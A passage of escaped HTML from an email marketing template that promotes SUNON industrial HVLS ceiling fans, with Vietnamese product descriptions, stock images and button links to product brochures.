<\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/L-series.pdf\\\" style=\\\"height:54px; v-text-anchor:middle; width:130px;\\\" arcsize=\\\"7.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#2dc26b\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/L-series.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #2dc26b; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">SUNON SERIES 3<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/cutsheet-haiku-en.pdf\\\" style=\\\"height:54px; v-text-anchor:middle; width:130px;\\\" arcsize=\\\"7.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#843fa1\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/cutsheet-haiku-en.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #843fa1; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">SUNON SERIES 10<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/H-series.pdf\\\" style=\\\"height:37px; v-text-anchor:middle; width:238px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#e67e23\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/H-series.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #e67e23; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">WALL INDUSTRIAL HVLS\\u00a0 FANS<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/L-series.pdf\\\" style=\\\"height:37px; v-text-anchor:middle; width:266px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#169179\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/L-series.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #169179; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">PORTABLE INDUSTRIAL HVLS FANS<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:28px 33px 25px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #444444; line-height: 200%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 200%;\\\">Qu\\u1ea1t tr\\u1ea7n c\\u00f4ng nghi\\u1ec7p l\\u1edbn ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng m\\u1ea1nh m\\u1ebd, th\\u1ed5i m\\u1ea1nh m\\u1ebd, ph\\u00f9 h\\u1ee3p \\u0111\\u1ec3 t\\u1ea3n nhi\\u1ec7t \\u0111\\u1ed1i l\\u01b0u trong kh\\u00f4ng gian r\\u1ed9ng, gi\\u00fap gi\\u1ea3m nhi\\u1ec7t \\u0111\\u1ed9 r\\u00f5 r\\u00e0ng m\\u1ed9t c\\u00e1ch hi\\u1ec7u qu\\u1ea3 v\\u00e0 t\\u1ea3n nhi\\u1ec7t \\u0111\\u1ec1u. V\\u1edbi vi\\u1ec7c s\\u1eed d\\u1ee5ng \\u0111\\u1ed9ng c\\u01a1 truy\\u1ec1n \\u0111\\u1ed9ng tr\\u1ef1c ti\\u1ebfp BLDC hi\\u1ec7u su\\u1ea5t cao, d\\u00f2ng qu\\u1ea1t c\\u00f4ng nghi\\u1ec7p m\\u1ea1nh m\\u1ebd c\\u1ee7a ch\\u00fang t\\u00f4i c\\u00f3 th\\u1ec3 ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng \\u0111\\u00e1ng k\\u1ec3 do s\\u1eed \\u0111\\u1ed9ng c\\u01a1 t\\u1eeb nam ch\\u00e2m do ch\\u00ednh SUNON thi\\u1ebft k\\u1ebf c\\u00f3 h\\u01a1n 40 n\\u0103m kinh nghi\\u1ec7m s\\u1ea3n xu\\u1ea5t v\\u00e0 nghi\\u00ean c\\u1ee9u. B\\u00ean c\\u1ea1nh \\u0111\\u00f3, d\\u00f2ng \\u0111\\u1ed9ng c\\u01a1 n\\u00e0y duy tr\\u00ec \\u0111\\u1ed9 b\\u1ec1n t\\u1ed1t m\\u00e0 kh\\u00f4ng c\\u1ea7n thay d\\u1ea7u th\\u01b0\\u1eddng xuy\\u00ean, cho ph\\u00e9p n\\u00f3 tr\\u1edf th\\u00e0nh s\\u1ef1 l\\u1ef1a ch\\u1ecdn hi\\u1ec7u qu\\u1ea3 nh\\u1ea5t v\\u1ec1 chi ph\\u00ed \\u0111\\u1ec3 \\u0111\\u1ea7u t\\u01b0 l\\u00e2u d\\u00e0i v\\u00e0o h\\u1ec7 th\\u1ed1ng \\u0111i\\u1ec1u h\\u00f2a kh\\u00f4ng kh\\u00ed th\\u01b0\\u01a1ng m\\u1ea1i.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167302539-Powerful3-02.jpeg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-family: helvetica,sans-serif; font-size: 20px; font-weight: 700;\\\">Powerful HVLS Fan series 3<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167903786-HVLS10-02.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-family: helvetica,sans-serif; font-size: 20px; font-weight: 700;\\\">Powerful HVLS Fan series 10<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:28px 33px 25px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #444444; line-height: 200%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 200%;\\\">Kh\\u00e1c v\\u1edbi h\\u1ea7u h\\u1ebft c\\u00e1c qu\\u1ea1t tr\\u1ea7n c\\u00f4ng nghi\\u1ec7p l\\u1edbn tr\\u00ean th\\u1ecb tr\\u01b0\\u1eddng d\\u1ef1a v\\u00e0o t\\u1ed1c \\u0111\\u1ed9 quay nhanh \\u0111\\u1ec3 t\\u1ea1o ra lu\\u1ed3ng kh\\u00f4ng kh\\u00ed kh\\u00f4ng \\u1ed5n \\u0111\\u1ecbnh v\\u00e0 kh\\u00f4ng \\u0111\\u1ed3ng \\u0111\\u1ec1u, Qu\\u1ea1t tr\\u1ea7n c\\u00f4ng nghi\\u1ec7p l\\u1edbn HVLS Fan series 10 s\\u1eed d\\u1ee5ng kh\\u1ea3 n\\u0103ng \\u0111i\\u1ec1u khi\\u1ec3n \\u0111\\u1ed9ng c\\u01a1 v\\u01b0\\u1ee3t tr\\u1ed9i \\u0111\\u1ec3 t\\u1ea1o ra gi\\u00f3 \\u0111\\u1ec1u v\\u00e0 nh\\u1eb9.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167720431-Powerful3-12.jpeg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680168052836-overhead_fans_commercia.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 